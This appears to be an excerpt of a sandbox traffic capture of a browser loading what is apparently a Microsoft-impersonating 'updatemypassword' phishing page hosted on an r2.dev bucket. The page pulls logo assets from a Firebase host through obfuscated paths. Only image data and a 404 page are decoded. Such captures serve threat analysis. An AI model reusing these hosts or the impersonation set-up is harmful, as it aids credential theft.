2024-04-17 23:23:15 UTC	682	OUT	GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:15 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3651 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "2084deafc36fbaca40a6352319b3c1edb1262245428033547de6b82e0c2dcfe8" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:15 GMT X-Served-By: cache-pdk-kfty2130063-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713396195.392139,VS0,VE5 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:15 UTC	1371	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 2c 34 2e 39 33 35 2c 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e Data Ascii: ,4.935,0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.
2024-04-17 23:23:15 UTC	902	IN	Data Raw: 33 39 2c 32 2e 34 33 39 2c 30 2c 30 2c 30 2d 31 2e 39 38 37 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e Data Ascii: 39,2.439,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	678	OUT	GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:15 UTC	590	IN	HTTP/1.1 200 OK Connection: close Content-Length: 240 Cache-Control: max-age=3600 Content-Type: image/png Etag: "a512441fed43fc63c5a2bbce213d4081532632f57c75eb60cb7dd0e4a1126b38" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:15 GMT X-Served-By: cache-pdk-kfty2130047-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713396195.391996,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:15 UTC	240	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 a2 49 44 41 54 48 89 ed 94 bb 0d c2 40 10 05 c7 08 11 bb 05 3a 20 21 44 e2 25 14 40 25 f4 e2 3e 28 80 e4 05 34 40 46 48 4e 44 07 47 6a 9d 6c d9 27 ed 49 20 f9 85 1b cc 68 3f da 26 a5 44 cd ac aa d2 17 c1 7f 09 24 b5 92 da 52 c1 7a 2e 1c b8 01 1b 60 17 2a e8 c1 b7 c0 b9 04 0e 13 23 ca e1 b6 ef 61 82 08 38 40 33 f4 2a 7a f0 3d f0 04 de 33 58 17 db 8f bc 58 fd 4c 07 3b 80 b8 11 8d 76 60 fb 03 9c 80 17 70 95 74 08 15 44 49 26 77 90 49 ba 70 41 26 39 96 0a 46 97 1c 95 df f9 a6 8b a0 5a be 46 47 3c 26 c0 3a 39 11 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRw=pHYs~IDATH@: !D%@%>(4@FHNDGjl'I h?&D$Rz.`#a8@3z=3XXL;v`ptDI&wIpA&9FZFG<&:9IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	681	OUT	GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:15 UTC	594	IN	HTTP/1.1 200 OK Connection: close Content-Length: 915 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "cf034e803491c0dbb1074332cd18fac418b94b0a139a7ddbf92ec40574951a8a" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:15 GMT X-Served-By: cache-pdk-kfty2130032-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713396195.392149,VS0,VE4 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:15 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 37 37 37 37 22 20 64 3d 22 4d 31 2e 31 34 33 2c 36 2e 38 35 37 61 31 2e 31 30 37 2c 31 2e 31 30 37 2c 30 2c 30 2c 31 2c 2e 34 34 36 2e 30 38 39 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2c 2e 36 30 37 2e 36 30 37 2c 31 2e 31 36 31 2c 31 2e 31 36 31 2c 30 2c 30 2c 31 2c 30 2c 2e 38 39 33 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2d 2e 36 30 37 2e 36 30 37 2c 31 2e 31 30 37 2c 31 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.18.3.35	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	757	OUT	GET /https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg/ HTTP/1.1 Host: pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:16 UTC	180	IN	HTTP/1.1 404 Not Found Date: Wed, 17 Apr 2024 23:23:16 GMT Content-Type: text/html Content-Length: 27242 Connection: close Server: cloudflare CF-RAY: 8760296fda3b1873-ATL
2024-04-17 23:23:16 UTC	1189	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 66 6f 6f 74 65 72 2d 74 69 74 6c 65 22 3e 49 73 20 74 68 69 73 20 79 6f 75 72 20 62 75 63 6b 65 74 3f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/"
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 Data Ascii: l="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 4c 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 43 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 20 36 32 2e 34 37 32 20 39 38 2e 33 33 34 35 20 36 37 2e 38 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 Data Ascii: <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 20 31 32 34 2e 37 31 37 20 31 30 36 2e 39 33 37 43 31 32 34 2e 30 35 38 20 31 30 36 2e 39 33 37 20 31 32 33 2e 34 30 36 20 31 30 37 2e 30 36 37 20 31 32 32 2e 37 39 38 20 31 30 37 2e 33 31 39 43 31 32 32 2e 31 38 39 20 31 30 37 2e 35 37 31 20 31 32 31 2e 36 33 36 20 31 30 37 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC"
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 43 31 33 34 2e 39 39 35 20 34 38 2e 39 35 31 36 20 31 33 31 2e 31 30 36 20 34 35 2e 30 36 32 37 20 31 33 31 2e 31 30 36 20 34 30 2e 32 36 35 36 43 31 33 31 2e 31 30 36 20 33 35 2e 34 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 Data Ascii: d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white"
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 37 34 20 31 31 30 2e 33 35 37 20 34 34 2e 35 31 31 38 20 31 31 31 2e 34 37 32 20 34 34 2e 35 31 33 39 43 31 31 32 2e 35 38 38 20 34 34 2e 35 31 33 39 20 31 31 33 2e 36 35 38 20 34 34 2e 30 37 30 36 20 31 31 34 2e 34 34 37 20 34 33 2e 32 38 31 33 43 31 31 35 2e 32 33 37 20 34 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 Data Ascii: 74 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.550
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 20 31 35 32 2e 36 34 31 20 31 32 37 2e 35 35 32 20 31 34 38 2e 32 34 39 20 31 32 37 2e 35 35 32 20 31 34 32 2e 38 33 31 43 31 32 37 2e 35 35 32 20 31 33 37 2e 34 31 32 20 31 33 31 2e 38 31 38 20 31 33 33 2e 30 32 20 31 33 37 2e 30 38 31 20 31 33 33 2e 30 32 43 31 34 32 2e 33 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 Data Ascii: 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g
2024-04-17 23:23:16 UTC	1369	IN	Data Raw: 36 2e 37 36 35 56 39 35 2e 32 34 33 37 48 31 30 33 2e 32 35 32 56 37 31 2e 31 39 32 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 Data Ascii: 6.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	415	OUT	GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:16 UTC	590	IN	HTTP/1.1 200 OK Connection: close Content-Length: 240 Cache-Control: max-age=3600 Content-Type: image/png Etag: "a512441fed43fc63c5a2bbce213d4081532632f57c75eb60cb7dd0e4a1126b38" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:16 GMT X-Served-By: cache-pdk-kfty2130034-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713396196.021885,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
